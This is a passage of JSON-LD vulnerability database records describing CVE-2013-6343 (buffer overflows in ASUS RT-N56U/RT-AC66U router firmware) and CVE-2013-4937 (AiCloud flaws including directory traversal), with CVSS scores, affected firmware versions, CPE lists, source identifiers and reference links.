"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-6343",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-00486",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-66345",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-6343",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-6343",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-00486",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-417",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-66345",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "VULHUB",
"id": "VHN-66345"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp. ASUS RT-N56U / RT-AC66U is a router device developed by ASUS. ASUS RT-N56U router is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed attempts will likely cause a denial-of-service condition. \nASUS RT-N56U running firmware 3.0.0.4.374_979 and prior are vulnerable. The vulnerability stems from the fact that the APP_Installation.asp page does not filter \u0027apps_name\u0027 and The \u0027apps_flag\u0027 parameter",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6343"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "BID",
"id": "65046"
},
{
"db": "VULHUB",
"id": "VHN-66345"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-66345",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66345"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6343",
"trust": 3.4
},
{
"db": "BID",
"id": "65046",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "102267",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "31033",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-417",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00486",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "124855",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-84386",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-61364",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-66345",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "VULHUB",
"id": "VHN-66345"
},
{
"db": "BID",
"id": "65046"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"id": "VAR-201401-0239",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "VULHUB",
"id": "VHN-66345"
}
],
"trust": 1.41918854
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
}
]
},
"last_update_date": "2025-04-11T23:01:42.712000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.asus.com/"
},
{
"title": "Cellspot router firmware update information",
"trust": 0.8,
"url": "https://support.t-mobile.com/docs/DOC-21994"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.asus.com/jp/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66345"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/65046"
},
{
"trust": 1.1,
"url": "https://support.t-mobile.com/docs/doc-21994"
},
{
"trust": 1.1,
"url": "http://www.exploit-db.com/exploits/31033"
},
{
"trust": 1.1,
"url": "http://osvdb.org/102267"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6343"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6343"
},
{
"trust": 0.8,
"url": "http://infosec42.blogspot.jp/2014/01/exploit-asus-rt-n56u-remote-root-shell.html"
},
{
"trust": 0.6,
"url": "https://bugs.webkit.org/show_bug.cgi?id=126946"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "VULHUB",
"id": "VHN-66345"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"db": "VULHUB",
"id": "VHN-66345"
},
{
"db": "BID",
"id": "65046"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"date": "2014-01-22T00:00:00",
"db": "VULHUB",
"id": "VHN-66345"
},
{
"date": "2014-01-21T00:00:00",
"db": "BID",
"id": "65046"
},
{
"date": "2014-01-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"date": "2014-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"date": "2014-01-22T05:22:12.737000",
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00486"
},
{
"date": "2016-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-66345"
},
{
"date": "2014-01-21T00:00:00",
"db": "BID",
"id": "65046"
},
{
"date": "2016-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005890"
},
{
"date": "2014-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-417"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-6343"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-N56U and RT-AC66U Router firmware buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005890"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-417"
}
],
"trust": 0.6
}
}
VAR-201307-0434
Vulnerability from variot - Updated: 2025-04-11 22:55Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors. ASUS RT-N66U is a wireless router product from ASUS Taiwan. A directory traversal vulnerability exists in ASUS RT-N66U version 3.0.0.4.270 and 3.0.0.4.354. Remote vulnerabilities can be used by remote attackers to obtain sensitive information, and the acquisition of this information can help launch further attacks. Other attacks may also be possible. The following versions are affected: ASUS RT-AC66U with firmware 3.0.0.4.354 and earlier, RT-N66U 3.0.0.4.370 and earlier, RT-N65U 3.0.0.4.346 and earlier, RT-N14U 3.0.0.4.356 and earlier, RT-N16 3.0.0.4.354 and earlier, RT-N56U 3.0.0.4.360 and earlier and 3.0.0.4.364 and earlier, DSL -N55U
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201307-0434",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.220"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "7.0.2.38b"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "1.0.1.9"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.3.108"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.3.178"
},
{
"model": "dsl-n56u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "1.0.0.9"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.3.162"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.246"
},
{
"model": "rt-n14u",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.356"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-n66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.370"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.342"
},
{
"model": "dsl-n55u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.7c"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.8l"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.334"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "8.1.1.4"
},
{
"model": "rt-n56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.360"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.140"
},
{
"model": "rt-ac66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.354"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.318"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "dsl-n56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.364"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.342"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.4o"
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.322"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "7.0.1.21"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "7.0.1.32"
},
{
"model": "rt-n16",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.354"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.134"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.270"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.3.176"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.246"
},
{
"model": "rt-n65u",
"scope": "lte",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.346"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.8j"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.7f"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.8n"
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.272"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.220"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.1.4"
},
{
"model": "dsl-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.188"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.0.2.3"
},
{
"model": "dsl-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.314"
},
{
"model": "rt-n65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.334"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "dsl-n55u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "dsl-n56u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac66u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-n14u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n14u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n16",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n56u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-n65u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n65u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n66u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.4.372"
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n14u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.356"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:asus:dsl-n55u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:dsl-n56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-ac66u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-n14u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n14u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-n16",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-n56u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-n65u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n65u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:asus:rt-n66u",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n66u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kyle Lovett",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
}
],
"trust": 0.6
},
"cve": "CVE-2013-4937",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-4937",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-08385",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-64939",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-4937",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-4937",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2013-08385",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-570",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-64939",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "VULHUB",
"id": "VHN-64939"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors. ASUS RT-N66U is a wireless router product from ASUS Taiwan. \nA directory traversal vulnerability exists in ASUS RT-N66U version 3.0.0.4.270 and 3.0.0.4.354. Remote vulnerabilities can be used by remote attackers to obtain sensitive information, and the acquisition of this information can help launch further attacks. Other attacks may also be possible. The following versions are affected: ASUS RT-AC66U with firmware 3.0.0.4.354 and earlier, RT-N66U 3.0.0.4.370 and earlier, RT-N65U 3.0.0.4.346 and earlier, RT-N14U 3.0.0.4.356 and earlier, RT-N16 3.0.0.4.354 and earlier, RT-N56U 3.0.0.4.360 and earlier and 3.0.0.4.364 and earlier, DSL -N55U",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4937"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"db": "BID",
"id": "60780"
},
{
"db": "VULHUB",
"id": "VHN-64939"
}
],
"trust": 3.06
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4937",
"trust": 2.8
},
{
"db": "BID",
"id": "60780",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-08385",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201307-145",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-64939",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "VULHUB",
"id": "VHN-64939"
},
{
"db": "BID",
"id": "60780"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
